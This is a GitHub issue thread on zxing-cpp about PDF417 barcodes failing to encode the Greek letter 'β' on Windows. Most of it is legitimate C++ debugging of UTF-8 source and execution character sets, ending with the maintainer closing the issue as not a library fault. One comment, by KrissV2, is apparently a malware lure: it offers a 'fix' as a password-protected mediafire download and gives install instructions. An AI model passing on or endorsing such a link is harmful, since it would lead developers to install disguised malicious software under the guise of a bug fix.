### ISSUE TITLE
ZXing cannot handle special Greek symbol "β"

### ISSUE THREAD

**Issue by Mq-b** [zxing-cpp/zxing-cpp#819] opened 2024-08-30 07:56 UTC
```cpp
// Scale the BitMatrix to the specified size
ZXing::BitMatrix scaleBitMatrix(const ZXing::BitMatrix& inputMatrix, int desiredWidth, int desiredHeight)
{
    int inputWidth = inputMatrix.width();
    int inputHeight = inputMatrix.height();

    double scaleX = static_cast<double>(desiredWidth) / inputWidth;
    double scaleY = static_cast<double>(desiredHeight) / inputHeight;

    ZXing::BitMatrix scaledMatrix(desiredWidth, desiredHeight);

    // Optimize mapping using the original matrix and scaling factors
    for (int y = 0; y < desiredHeight; ++y) {
        int originalY = static_cast<int>(y / scaleY);
        if (originalY >= inputHeight) originalY = inputHeight - 1;

        for (int x = 0; x < desiredWidth; ++x) {
            int originalX = static_cast<int>(x / scaleX);
            if (originalX >= inputWidth) originalX = inputWidth - 1;

            scaledMatrix.set(x, y, inputMatrix.get(originalX, originalY));
        }
    }

    return scaledMatrix;
}

// Generate a barcode image
cv::Mat generateBarcode(const std::string& input, int barcodeWidth, int barcodeHeight)
{
    ZXing::MultiFormatWriter writer(ZXing::BarcodeFormat::PDF417);

    ZXing::BitMatrix bitMatrix = writer.encode(input, barcodeWidth, barcodeHeight);

    // Use the bitMatrix directly if it is already the target size
    if (bitMatrix.width() != barcodeWidth || bitMatrix.height() != barcodeHeight) {
        bitMatrix = scaleBitMatrix(bitMatrix, barcodeWidth, barcodeHeight);
    }

    cv::Mat barcodeImage(bitMatrix.height(), bitMatrix.width(), CV_8UC1, cv::Scalar(255)); // White background

    for (int y = 0; y < bitMatrix.height(); ++y) {
        for (int x = 0; x < bitMatrix.width(); ++x) {
            if (bitMatrix.get(x, y)) {
                barcodeImage.at<uchar>(y, x) = 0; // Black pixel
            }
        }
    }

    return barcodeImage;
}

```

My environment isn't utf8, and I've tried a lot of things. For example, even if I make sure that the input string is utf8, I can debug it and see that there is no problem, but the barcode data is not right.

**Comment by oehhar** [comment] 2024-08-30 08:06
Hi Mq-b,
"barcode is not right" may be checked. Could you post the resulting code?

Remark that for encoding greek characters, you need an ECI within the barcode data.

You may always generate a correct code using qtzint, which does it right following ISO-Standards.

Remark that "right" is relative. Right in which sense?

- that the native i-phone and Android decoders (Google ML library used by both of them) get out the string which was encoded?
- that it is correctly encoded following ISO/IEC 18004 in the QR-Code case?
- another definition? Remark, that an ISO/IEC SC31 WG1 study identified 76 QR-Code scanning apps which mostly behave differently in respect of non-printable ASCII (well there are cases, where even printable ASCII does not work, see qtzint).

Thank you and take care,
Harald

**Comment by Mq-b** [comment] 2024-08-30 08:43
thank you.

I will now try to write a minimal repetition example. I now find that the PDF417 QR code generated by this example does not scan the symbol "β".

```cpp
#include <opencv2/opencv.hpp>
#include <BarcodeFormat.h>
#include <BitMatrix.h>
#include <TextUtfEncoding.h>
#include <MultiFormatWriter.h>

using namespace cv;
using namespace ZXing;

int main() {
    std::string input = "Hello, ZXing! This is a PDF417 barcode.-β";

    MultiFormatWriter writer(BarcodeFormat::PDF417);
    auto bitMatrix = writer.encode(input, 200, 100);

    int width = bitMatrix.width();
    int height = bitMatrix.height();
    Mat barcodeImage(height, width, CV_8UC1);

    for (int y = 0; y < height; ++y) {
        for (int x = 0; x < width; ++x) {
            barcodeImage.at<uint8_t>(y, x) = bitMatrix.get(x, y) ? 0 : 255;
        }
    }

    namedWindow("PDF417 Barcode", WINDOW_NORMAL);
    imshow("PDF417 Barcode", barcodeImage);
    waitKey(0);

    imwrite("pdf417_barcode.png", barcodeImage);
}
```

**Comment by Mq-b** [comment] 2024-08-30 08:56
I also found a problem, whether it is this special symbol, or Chinese, as long as non-ASCII characters, ZXing can not interpret the conversion to PDF417, and even all the content after these characters will be ignored. For example:

```txt
std::string input = "Hello, ZXing! β This is a PDF417 barcode.";
```

After ZXing processing, there is actually only "Hello, ZXing! "Everything else is truncated.

**Comment by Mq-b** [comment] 2024-08-30 08:59
By the way, I'm running windows10 and chcp 936.

**Comment by heroboy** [comment] 2024-08-30 09:22
```cpp
BitMatrix MultiFormatWriter::encode(const std::string& contents, int width, int height) const
{
	return encode(FromUtf8(contents), width, height);
}
```
***FromUtf8***

**Comment by Mq-b** [comment] 2024-08-30 09:24
Thank you. What do you mean? Are all utf8 guaranteed?

**Comment by axxel** [comment] 2024-08-30 10:09
Please do the following:
1. make sure you only input UTF8 encoded strings into the `MultiFormatWriter::encode` API. Use platform functions to convert your input first if required.
2. Add the line `writer.setEncoding(CharacterSet::UTF8);` right before you call `writer.encode(...)`.

You can also have a look at #815 and try out the new `ZXING_EXPERIMENTAL_API`. Note that you need the latest HEAD for that and still need to provide UTF8 encoded input.

**Comment by Mq-b** [comment] 2024-08-30 10:44
@axxel Thank you, but it's closed now, and I've actually tried all of this in my project, but I'll try to use it later in this minimal recurrence example with no other distractions. Thanks again

**Comment by KrissV2** [comment] 2024-08-31 04:36
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Mq-b** [comment] 2024-08-31 09:04
```cpp
#include <opencv2/opencv.hpp>
#include <BarcodeFormat.h>
#include <BitMatrix.h>
#include <TextUtfEncoding.h>
#include <MultiFormatWriter.h>

using namespace cv;
using namespace ZXing;

int main() {
    std::string input = "Hello, ZXing! β This is a PDF417 barcode.";

    MultiFormatWriter writer(BarcodeFormat::PDF417);
    writer.setEncoding(ZXing::CharacterSet::UTF8);
    auto bitMatrix = writer.encode(input, 200, 100);

    int width = bitMatrix.width();
    int height = bitMatrix.height();
    Mat barcodeImage(height, width, CV_8UC1);

    for (int y = 0; y < height; ++y) {
        for (int x = 0; x < width; ++x) {
            barcodeImage.at<uint8_t>(y, x) = bitMatrix.get(x, y) ? 0 : 255;
        }
    }

    namedWindow("PDF417 Barcode", WINDOW_NORMAL);
    imshow("PDF417 Barcode", barcodeImage);
    waitKey(0);

    imwrite("pdf417_barcode.png", barcodeImage);
}
```

I now have global utf-8 on, which is another computer of my own, with both the execution and source character sets utf8, and I find the results even weirder:

> Hello, ZXing!  Thiis aDF41barcode.

If you remove the symbol "β", it is correct, which is strange, as if the symbol messes with the coding.

**Comment by Mq-b** [comment] 2024-08-31 09:07
I am now almost certain that ZXing is unable to handle special symbols and that my current environment is absolutely utf-8.

chcp 65001.

**Comment by Mq-b** [comment] 2024-08-31 09:10
@heroboy

**Comment by heroboy** [comment] 2024-08-31 14:12
我一点都不相信 "β"会被正确编译成正确的utf8编码"\xce\xb2"。

**Comment by Mq-b** [comment] 2024-08-31 14:13
what？

**Comment by frederick-vs-ja** [comment] 2024-09-02 08:52
> 我一点都不相信 "β"会被正确编译成正确的utf8编码"\xce\xb2"。

You seemed to forget to use `/utf-8` option for MSVC.

**Comment by frederick-vs-ja** [comment] 2024-09-02 09:15
I think we should test `std::wstring` version first to determine whether the issue is about encoding conversion.

**Comment by heroboy** [comment] 2024-09-02 09:29
> > 我一点都不相信 "β"会被正确编译成正确的utf8编码"\xce\xb2"。
> 
> You seemed to forget to use `/utf-8` option for MSVC.

我是不相信mq-b. 他在纠结于系统的编码。而不是文件和编译器的编码。

**Comment by Mq-b** [comment] 2024-09-02 10:26
Wrong, adding the /utf-8 option makes no difference, my windows already has global utf-8 enabled, msvc's default source character set and execution character set will be utf-8, besides, I've tested it and it doesn't work.

**Comment by axxel** [comment] 2024-09-02 22:11
@Mq-b could you please replace your `input` with the following string: `"Test \xce\xb2"` and then post the resulting image here.

@heroboy could you please translate your comments into English before posting them here, this will greatly improve your reach. ;)

**Comment by Mq-b** [comment] 2024-09-03 10:46
It's weird. It's the right thing to do, to sweep it out.
![pdf417_barcode](https://github.com/user-attachments/assets/699fe4a9-fb3a-4a04-95e3-cc44c7d5c6f1)

**Comment by Mq-b** [comment] 2024-09-03 10:48
I think I have a rough idea why, it works on my current computer, but my company's projects have trouble making sure utf-8 executes character sets, I'll look at that later.

**Comment by axxel** [comment] 2024-09-03 12:20
> It's weird. It's the right thing to do, to sweep it out.

I don't know what you mean but I see you posted a PDF417 symbol that contains the correct content. My conclusion is that there is nothing wrong with `zxing-cpp` encoding a 'β' character if that character is provided as a valid utf-8 string. How to set up your compiler / runtime environment on windows to provide that is outside the scope of this project. That said, if you find some useful information on how to fix your issue, feel free to post it here, in case others run into it as well.

If you agree with that assessment, please close this issue.

**Comment by Mq-b** [comment] 2024-09-04 01:30
I had an even weirder problem with the company computer. I set the execution character set and the source character set to utf-8. As a result, it could scan the Chinese result, but it could not scan the Greek character "β".

```cpp
#include <opencv2/opencv.hpp>
#include <BarcodeFormat.h>
#include <BitMatrix.h>
#include <TextUtfEncoding.h>
#include <MultiFormatWriter.h>

using namespace cv;
using namespace ZXing;

int main() {

    std::string input = "Hello, ZXing! β 你好";

    MultiFormatWriter writer(BarcodeFormat::PDF417);
    writer.setEncoding(ZXing::CharacterSet::UTF8);
    auto bitMatrix = writer.encode(input, 200, 100);

    int width = bitMatrix.width();
    int height = bitMatrix.height();
    Mat barcodeImage(height, width, CV_8UC1);

    for (int y = 0; y < height; ++y) {
        for (int x = 0; x < width; ++x) {
            barcodeImage.at<uint8_t>(y, x) = bitMatrix.get(x, y) ? 0 : 255;
        }
    }

    namedWindow("PDF417 Barcode", WINDOW_NORMAL);
    imshow("PDF417 Barcode", barcodeImage);
    waitKey(0);

    imwrite("pdf417_barcode.png", barcodeImage);
}
```

![pdf417_barcode](https://github.com/user-attachments/assets/7faf5c3d-96c1-47a2-a42d-e49eb77609bb)

> Hello, ZXing!  你好

I don't understand why this is, if there is still a problem, it should not be able to scan the Chinese, at least not before. But it does work, but it's not enough. I used things like msvc2017 + qt5.12 and I set the compilation options:

```qmake
QMAKE_CXXFLAGS += /utf-8
```

**Comment by axxel** [comment] 2024-09-07 23:28
Your new finding does not seem to invalidate the earlier conclusion that `zxing-cpp` is not to blame here. I suggest you try to debug this by outputting the exact set of bytes passed to the `encode` function and compare that to `\x48\x65\x6c\x6c\x6f\x2c\x20\x5a\x58\x69\x6e\x67\x21\x20\xce\xb2\x20\xe4\xbd\xa0\xe5\xa5\xbd` or alternatively set your input to this string and see what happens.

On my Linux system `ZXingWriter PDF417 "Hello, ZXing! β 你好" out.png` works just fine.

**Closed by axxel** 2024-09-07 23:28 UTC

**Comment by frederick-vs-ja** [comment] 2024-09-08 03:07
I guess zxing-cpp is correct here, and there's something wrong in some old verision of Windows. Not sure whether it's possible to have a workaround for the possibly OS bug.

**Comment by Mq-b** [comment] 2024-09-08 03:42
> I guess zxing-cpp is correct here, and there's something wrong in some old verision of Windows. Not sure whether it's possible to have a workaround for the possibly OS bug.

It's possible. I'll test it tomorrow.

**Comment by Mq-b** [comment] 2024-09-09 02:05
No, I have tested, windows 10 and windows 11 systems, do not enable the global utf-8, can not support this special symbol, but support Chinese, very strange.

**Comment by heroboy** [comment] 2024-09-09 03:24
Please print your string(const char*) in hex encoding.
Also, try use `u8""` and `L""`, see what will happen?
Also, verify what is your source code encoding.
Also, verify that "/utf-8" is actually pass to your cl.exe command line.
